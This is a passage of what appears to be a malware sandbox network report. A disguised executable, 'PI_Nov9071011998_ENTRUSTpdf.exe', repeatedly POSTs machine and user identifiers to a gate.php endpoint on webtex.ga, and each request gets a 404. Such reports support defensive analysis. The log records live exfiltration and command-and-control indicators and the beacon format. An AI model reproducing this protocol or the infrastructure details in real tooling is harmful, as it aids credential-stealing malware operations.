                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:43.050733089 CET175INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    36192.168.2.34975247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:43.283330917 CET175OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:43.301074028 CET176OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:43.342667103 CET176INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    37192.168.2.34975547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:43.612446070 CET190OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:43.629123926 CET191OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:43.673908949 CET196INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    38192.168.2.34975647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:43.931444883 CET198OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:43.949999094 CET198OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:43.995368004 CET199INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:01 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    39192.168.2.34975847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:44.249686956 CET204OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:44.266457081 CET205OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:44.316339016 CET208INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:01 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    4192.168.2.34971347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:30.776444912 CET70OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:30.795722008 CET70OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:30.840723038 CET70INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:48 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    40192.168.2.34975947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:44.661642075 CET212OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:44.678453922 CET213OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:44.797399998 CET213INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:01 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    41192.168.2.34976047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:45.021437883 CET214OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:45.037956953 CET214OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:45.078031063 CET214INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:02 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    42192.168.2.34976147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:45.361001968 CET215OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:45.378002882 CET215OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:45.419547081 CET216INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:02 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    43192.168.2.34976247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:45.691221952 CET217OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:45.710731030 CET217OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:45.752643108 CET217INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:02 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    44192.168.2.34976347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:46.008230925 CET218OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:46.027164936 CET218OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:46.068412066 CET218INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:03 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    45192.168.2.34976447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:46.321985960 CET219OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:46.338841915 CET220OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:46.384202957 CET220INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:03 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    46192.168.2.34976547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:46.623970985 CET221OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:46.645278931 CET221OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:46.686218977 CET221INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:03 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    47192.168.2.34976647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:46.941906929 CET222OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:46.959496021 CET222OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:47.002928019 CET223INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:04 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    48192.168.2.34976747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:47.207695961 CET223OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:47.224323034 CET224OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:47.267354965 CET224INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:04 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    49192.168.2.34976847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:47.508867979 CET225OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:47.525604963 CET225OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:47.583863974 CET225INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:04 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    5192.168.2.34971447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:31.118510962 CET71OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:31.135189056 CET71OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:31.264031887 CET72INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:48 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    50192.168.2.34976947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:47.814805984 CET226OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:47.831594944 CET226OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:47.873610973 CET227INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:05 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    51192.168.2.34977047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:48.133006096 CET227OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:48.149697065 CET228OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:48.194021940 CET228INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:05 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    52192.168.2.34977147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:48.431386948 CET229OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:48.448147058 CET229OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:48.492337942 CET229INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:05 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    53192.168.2.34977247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
